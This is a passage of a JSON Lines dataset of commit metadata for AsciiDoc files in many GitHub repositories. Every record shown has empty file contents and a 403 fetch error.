'_posts\/2017-12-02-Structured-logging-with-SL-FJ-and-Logback.adoc'","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-12-02-Structured-logging-with-SL-FJ-and-Logback.adoc","new_file":"_posts\/2017-12-02-Structured-logging-with-SL-FJ-and-Logback.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b59b0b6d387766ff579c2439103a2852d7d01876","subject":"Create Features.adoc","message":"Create Features.adoc","repos":"igagis\/svgren,igagis\/svgren,igagis\/svgren","old_file":"wiki\/Features.adoc","new_file":"wiki\/Features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/svgren.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e7cc599f879215ba7ee803625a943e7a2af6ee9","subject":"Minor fixes in the MVP section","message":"Minor fixes in the MVP section\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db985e955add75dd0077e8201013b737b4d41a83","subject":"Update 2015-11-03-Hello.adoc","message":"Update 2015-11-03-Hello.adoc","repos":"ferandec\/ferandec.github.io,ferandec\/ferandec.github.io,ferandec\/ferandec.github.io","old_file":"_posts\/2015-11-03-Hello.adoc","new_file":"_posts\/2015-11-03-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ferandec\/ferandec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"246443fd7d9f8475bcce279a782ff5727de7228c","subject":"Update 2016-10-25-S-R-E.adoc","message":"Update 2016-10-25-S-R-E.adoc","repos":"LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io","old_file":"_posts\/2016-10-25-S-R-E.adoc","new_file":"_posts\/2016-10-25-S-R-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LihuaWu\/lihuawu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df5cf3b0fea9b9940276f4ae1363f253e4a10efa","subject":"Update 2017-07-28-mecab.adoc","message":"Update 2017-07-28-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-mecab.adoc","new_file":"_posts\/2017-07-28-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77eb272323b5558ba6c970f31cf0d7eeff045f8c","subject":"Update 2019-01-31-Titre.adoc","message":"Update 2019-01-31-Titre.adoc","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2019-01-31-Titre.adoc","new_file":"_posts\/2019-01-31-Titre.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23048dd5345e0a90d750d23f822c8ecf61211007","subject":"Update 2016-09-03-IT-experts-you-should-follow-on-twitter.adoc","message":"Update 2016-09-03-IT-experts-you-should-follow-on-twitter.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-09-03-IT-experts-you-should-follow-on-twitter.adoc","new_file":"_posts\/2016-09-03-IT-experts-you-should-follow-on-twitter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0000d694467e92d589ab06a29ae7ff846cffec0f","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","message":"Update 
2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"874e893f0bbfcd8d45c13a1e0a3edb73dcd12e44","subject":"chore(promise-chain): s\/\u975e\u540c\u671f\u51e6\u7406\u304c\u52a0\u3048\u305f\/\u975e\u540c\u671f\u51e6\u7406\u3092\u52a0\u3048\u305f\/","message":"chore(promise-chain): s\/\u975e\u540c\u671f\u51e6\u7406\u304c\u52a0\u3048\u305f\/\u975e\u540c\u671f\u51e6\u7406\u3092\u52a0\u3048\u305f\/\n","repos":"azu\/promises-book,liyunsheng\/promises-book,oToUC\/promises-book,purepennons\/promises-book,azu\/promises-book,genie88\/promises-book,cqricky\/promises-book,oToUC\/promises-book,dieface\/promises-book,liubin\/promises-book,xifeiwu\/promises-book,charlenopires\/promises-book,wenber\/promises-book,xifeiwu\/promises-book,charlenopires\/promises-book,mzbac\/promises-book,genie88\/promises-book,xifeiwu\/promises-book,lidasong2014\/promises-book,wangwei1237\/promises-book,purepennons\/promises-book,azu\/promises-book,liubin\/promises-book,wangwei1237\/promises-book,cqricky\/promises-book,tangjinzhou\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,liubin\/promises-book,wenber\/promises-book,mzbac\/promises-book,wangwei1237\/promises-book,purepennons\/promises-book,genie88\/promises-book,azu\/promises-book,dieface\/promises-book,tangjinzhou\/promises-book,dieface\/promises-book,tangjinzhou\/promises-book,liyunsheng\/promises-book,wenber\/promises-book,lidasong2014\/promises-book,oToUC\/promises-book,liyunsheng\/promises-book,cqricky\/promises-book,sunfurong\/promise,sunfurong\/promise,mzbac\/promises-book,charlenopires\/promises-book","old_file":"Ch4_AdvancedPromises\/promise-chain.adoc","new_file":"Ch4_AdvancedPromises\/promise-chain.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ec6534d83499ea0e4856762f46d192be3a14446","subject":"Update and rename goci-interfaces\/goci-ui\/src\/main\/docs to goci-interfaces\/goci-ui\/src\/main\/docs\/fileheaders-content.adoc","message":"Update and rename goci-interfaces\/goci-ui\/src\/main\/docs to goci-interfaces\/goci-ui\/src\/main\/docs\/fileheaders-content.adoc","repos":"EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci","old_file":"goci-interfaces\/goci-ui\/src\/main\/docs\/fileheaders-content.adoc","new_file":"goci-interfaces\/goci-ui\/src\/main\/docs\/fileheaders-content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EBISPOT\/goci.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2f18e2ac5f496f83b6ff491e3c84d43ebc264007","subject":"Update 2016-01-05-Why-Theres-No-Relationship-Version-Control.adoc","message":"Update 
2016-01-05-Why-Theres-No-Relationship-Version-Control.adoc","repos":"blackGirlsCode\/blog,blackGirlsCode\/blog,blackGirlsCode\/blog","old_file":"_posts\/2016-01-05-Why-Theres-No-Relationship-Version-Control.adoc","new_file":"_posts\/2016-01-05-Why-Theres-No-Relationship-Version-Control.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blackGirlsCode\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44148156d659cb7c1e598ab1a91b783b015e8cfa","subject":"Update 2016-05-23-Are-some-people-more-Intelligent-than-others-A-Mathematical-Perspective.adoc","message":"Update 2016-05-23-Are-some-people-more-Intelligent-than-others-A-Mathematical-Perspective.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2016-05-23-Are-some-people-more-Intelligent-than-others-A-Mathematical-Perspective.adoc","new_file":"_posts\/2016-05-23-Are-some-people-more-Intelligent-than-others-A-Mathematical-Perspective.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19a026079bf46024f3803a57c68ebccf4ebf9396","subject":"tutorial: publishToConfluence","message":"tutorial: publishToConfluence\n","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/020_tutorial\/070_publishToConfluence.adoc","new_file":"src\/docs\/020_tutorial\/070_publishToConfluence.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d276d6770c24611dc273f0d914e081a84d5351e5","subject":"Update 2018-01-09-Build-Blog-With-Hub-Press.adoc","message":"Update 2018-01-09-Build-Blog-With-Hub-Press.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2018-01-09-Build-Blog-With-Hub-Press.adoc","new_file":"_posts\/2018-01-09-Build-Blog-With-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2818079ecc54dc1b19d7f50c83edaaad7f476079","subject":"Update 2017-04-12-Quando-il-destino-ha-voglia-di-scherzare.adoc","message":"Update 2017-04-12-Quando-il-destino-ha-voglia-di-scherzare.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-12-Quando-il-destino-ha-voglia-di-scherzare.adoc","new_file":"_posts\/2017-04-12-Quando-il-destino-ha-voglia-di-scherzare.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57d0f5e6d5c611cde78c758a6a68b0f6ef99efc1","subject":"CAMEL-14446 - Create an AWS-ECS component based on SDK v2 - Added docs","message":"CAMEL-14446 - Create an 
AWS-ECS component based on SDK v2 - Added docs\n","repos":"adessaigne\/camel,tadayosi\/camel,nicolaferraro\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tadayosi\/camel,apache\/camel,zregvart\/camel,pmoerenhout\/camel,adessaigne\/camel,christophd\/camel,tdiesler\/camel,gnodet\/camel,apache\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,mcollovati\/camel,apache\/camel,pax95\/camel,apache\/camel,alvinkwekel\/camel,cunningt\/camel,ullgren\/camel,tdiesler\/camel,cunningt\/camel,pax95\/camel,tdiesler\/camel,adessaigne\/camel,adessaigne\/camel,adessaigne\/camel,nicolaferraro\/camel,christophd\/camel,nikhilvibhav\/camel,DariusX\/camel,cunningt\/camel,tadayosi\/camel,DariusX\/camel,zregvart\/camel,zregvart\/camel,pmoerenhout\/camel,cunningt\/camel,alvinkwekel\/camel,ullgren\/camel,mcollovati\/camel,ullgren\/camel,nikhilvibhav\/camel,tadayosi\/camel,pmoerenhout\/camel,DariusX\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,pmoerenhout\/camel,gnodet\/camel,DariusX\/camel,tadayosi\/camel,ullgren\/camel,apache\/camel,christophd\/camel,mcollovati\/camel,tdiesler\/camel,christophd\/camel,gnodet\/camel,alvinkwekel\/camel,gnodet\/camel,christophd\/camel,cunningt\/camel,pax95\/camel,pax95\/camel,pax95\/camel,mcollovati\/camel,alvinkwekel\/camel,zregvart\/camel,tdiesler\/camel,adessaigne\/camel,pax95\/camel,cunningt\/camel,apache\/camel,christophd\/camel,tdiesler\/camel,tadayosi\/camel,gnodet\/camel","old_file":"components\/camel-aws2-ecs\/src\/main\/docs\/aws2-ecs-component.adoc","new_file":"components\/camel-aws2-ecs\/src\/main\/docs\/aws2-ecs-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b454f83cd041fe229fe52e6286f070bb2f430cbe","subject":"Update 2015-05-25-sehr-kleine-Haubentaucher.adoc","message":"Update 2015-05-25-sehr-kleine-Haubentaucher.adoc","repos":"fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io","old_file":"_posts\/2015-05-25-sehr-kleine-Haubentaucher.adoc","new_file":"_posts\/2015-05-25-sehr-kleine-Haubentaucher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fundstuecke\/fundstuecke.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"109bb36c6be4e92bb2a00e2f4188f772ff881841","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f77a4395225ac0d268208df721135a14c0ff4e6b","subject":"fixed https:\/\/github.com\/docker\/labs\/issues\/352","message":"fixed 
https:\/\/github.com\/docker\/labs\/issues\/352\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch08-aws.adoc","new_file":"developer-tools\/java\/chapters\/ch08-aws.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"922745ceb1dcc829baa39b26c8e4a47f2ade98a1","subject":"Update 2017-01-04-Keep-English-Learn.adoc","message":"Update 2017-01-04-Keep-English-Learn.adoc","repos":"raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io","old_file":"_posts\/2017-01-04-Keep-English-Learn.adoc","new_file":"_posts\/2017-01-04-Keep-English-Learn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raloliver\/raloliver.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a713ea0d8a5e62e747cd567afdaf13b7610e0a06","subject":"Update 2017-05-09-Dquad-Obsession-V2.adoc","message":"Update 2017-05-09-Dquad-Obsession-V2.adoc","repos":"OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io","old_file":"_posts\/2017-05-09-Dquad-Obsession-V2.adoc","new_file":"_posts\/2017-05-09-Dquad-Obsession-V2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OctavioMaia\/octaviomaia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91cf50065ec0c3ad4f3d9615ef5d80dba0824e99","subject":"convert ykinfo manpage to asciidoc","message":"convert ykinfo manpage to asciidoc\n","repos":"eworm-de\/yubikey-personalization,Yubico\/yubikey-personalization-dpkg,eworm-de\/yubikey-personalization,Yubico\/yubikey-personalization,Yubico\/yubikey-personalization-dpkg,Yubico\/yubikey-personalization-dpkg,eworm-de\/yubikey-personalization,Yubico\/yubikey-personalization","old_file":"man\/ykinfo.1.adoc","new_file":"man\/ykinfo.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubikey-personalization.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c9e4b3c07eade9518be4d90cdd5d076e6c79fce0","subject":"y2b create post Are You Carrying Your Keys Smart?","message":"y2b create post Are You Carrying Your Keys Smart?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-12-Are-You-Carrying-Your-Keys-Smart.adoc","new_file":"_posts\/2016-08-12-Are-You-Carrying-Your-Keys-Smart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58eef87c90def3b4920536088a85cfdf7905f608","subject":"Update 2017-01-16-DEUTSCHE-SPRACHBENENNUNGSREFORM-MMXVII.adoc","message":"Update 
2017-01-16-DEUTSCHE-SPRACHBENENNUNGSREFORM-MMXVII.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-01-16-DEUTSCHE-SPRACHBENENNUNGSREFORM-MMXVII.adoc","new_file":"_posts\/2017-01-16-DEUTSCHE-SPRACHBENENNUNGSREFORM-MMXVII.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"3dde9257248d7c537f24c25ab79d0c33a03e42d5","subject":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","message":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"d61b535a83fa3e9ae7e88efa3f9ac5c20e6fddbb","subject":"Update 2017-03-13-Criando-um-projeto-Grails-3-com-Angular-2.adoc","message":"Update 2017-03-13-Criando-um-projeto-Grails-3-com-Angular-2.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2017-03-13-Criando-um-projeto-Grails-3-com-Angular-2.adoc","new_file":"_posts\/2017-03-13-Criando-um-projeto-Grails-3-com-Angular-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0ec87ea32bd4ac99818e6437536a09be2843a730","subject":"CL note: more libs","message":"CL note: more libs\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"}
{"commit":"50f250e7190156be334f349274278d2b8e01aa50","subject":"edit latency","message":"edit latency\n","repos":"kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"trex_stateless.asciidoc","new_file":"trex_stateless.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"f8d58a2872937efa069c97341362df42a537bd98","subject":"Update 2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","message":"Update 2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","new_file":"_posts\/2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"da822f77c01de63531eb206cb3bd35c28d09d2a4","subject":"Update 2015-05-17-Shut-Up.adoc","message":"Update 2015-05-17-Shut-Up.adoc","repos":"flug\/flug.github.io,flug\/flug.github.io,flug\/flug.github.io,flug\/flug.github.io","old_file":"_posts\/2015-05-17-Shut-Up.adoc","new_file":"_posts\/2015-05-17-Shut-Up.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flug\/flug.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"083cd03159fbdb9a65ee10c6f43f7bc8319d3e19","subject":"Mid-2018 Release Notes","message":"Mid-2018 Release Notes\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2018-07-01-release.adoc","new_file":"content\/news\/2018-07-01-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"}
{"commit":"ecec606ae0594abf3b70a91ea5826e514fa27999","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"fabe008bba78046d76fc7db956e04dd4c5930a82","subject":"Update 2017-07-28-Goal-Tracking.adoc","message":"Update 2017-07-28-Goal-Tracking.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-28-Goal-Tracking.adoc","new_file":"_posts\/2017-07-28-Goal-Tracking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"4de5a752840b1eb7f1f7147f8e95dfcbd9ac7a90","subject":"Update 2016-04-12-un-poco-sobre-Metasploit.adoc","message":"Update 2016-04-12-un-poco-sobre-Metasploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-un-poco-sobre-Metasploit.adoc","new_file":"_posts\/2016-04-12-un-poco-sobre-Metasploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"33a33e72a6769e2c8c1ea1978302a2a66dadf1b0","subject":"Update 2016-09-13-Encrypted-Hetzner-Server.adoc","message":"Update 2016-09-13-Encrypted-Hetzner-Server.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc","new_file":"_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"f1d754468d125e5fee09b3ac962d968cb1733c4d","subject":"y2b create post It Knows How Fat You Are...","message":"y2b create post It Knows How Fat You Are...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-19-It-Knows-How-Fat-You-Are.adoc","new_file":"_posts\/2017-07-19-It-Knows-How-Fat-You-Are.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"7c23b7759722c8c4d25dcda79103a9f272e1a4bf","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b33862e5583ad1c2a9870663631fc08176c3f08f","subject":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","message":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"2316553a37349cb5983194b9f4ddfddf97a11e5d","subject":"Update 2017-01-31-Video-Updating-your-Satellite-6-system.adoc","message":"Update 2017-01-31-Video-Updating-your-Satellite-6-system.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-01-31-Video-Updating-your-Satellite-6-system.adoc","new_file":"_posts\/2017-01-31-Video-Updating-your-Satellite-6-system.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"9a2de5ec4c3fafce6776f7b1aa325c5160365e9b","subject":"Update 2017-07-05-Ansible-and-rolling-upgrades.adoc","message":"Update 2017-07-05-Ansible-and-rolling-upgrades.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-07-05-Ansible-and-rolling-upgrades.adoc","new_file":"_posts\/2017-07-05-Ansible-and-rolling-upgrades.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
